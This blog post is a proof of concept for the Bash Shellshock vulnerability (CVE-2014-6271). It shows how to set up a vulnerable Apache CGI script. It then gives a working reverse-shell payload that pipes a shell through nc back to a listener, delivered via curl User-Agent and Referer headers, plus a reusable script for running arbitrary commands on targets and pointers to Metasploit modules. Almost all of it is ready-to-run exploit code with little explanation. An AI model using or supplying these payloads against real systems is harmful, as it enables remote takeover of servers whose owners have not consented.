hacktracking: # CVE-2014-6271: Bash shellshock

# CVE-2014-6271: Bash shellshock

Reverse shell PoC

- Vulnerable server

# a2enmod cgi
# sed -i 's/#Include conf-available\/serve-cgi-bin.conf/Include conf-available\/serve-cgi-bin.conf/' /etc/apache2/sites-available/000-default.conf
# service apache2 restart
# cat /usr/lib/cgi-bin/env.sh
#!/bin/bash

echo 'Content-type: text/html'
echo ''

echo '<html>'
echo '<head>'
echo '<title>cve-2014-6271</title>'
echo '</head>'
echo '<body>'
echo '<pre>'

/usr/bin/env

echo '</pre>'
echo '</body>'
echo '</hmtl>'

- Client

# ip="192.168.1.1"
# nc -v --listen $ip --port=1234

# ip="192.168.1.1"
# payload="() { :; }; /bin/bash -c 'rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc $ip 1234 > /tmp/f'"
# url="http://192.168.1.2/cgi-bin/env.sh"
# curl --verbose --user-agent "$payload" --referer "$payload" $url

nc: connect to 192.168.1.1 1234 from 192.168.1.2
$

Scripts

# cat cve-2014-6271-cmd
#!/bin/bash

#https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271

proto="$1"
host="$2"
port="$3"
path="$4"
cmd="$5"

if [ "$proto" == "https" ]; then
        insecure='--insecure'
else
        insecure=''
fi

url="$proto://$host:$port/$path"

payload="() { :; }; echo -e '\\r\\n'; $cmd 2>&1"

curl $insecure --verbose --user-agent "$payload" --referer "$payload" $url

# ./cve-2014-6271-cmd http 127.0.0.1 1580 cgi-bin/env.sh '/bin/uname -a'

Metasploit modules

msf > use auxiliary/scanner/http/apache_mod_cgi_bash_env
msf > use exploits/multi/http/apache_mod_cgi_bash_env_exec

# CVE-2014-6271: Bash shellshock

No comments: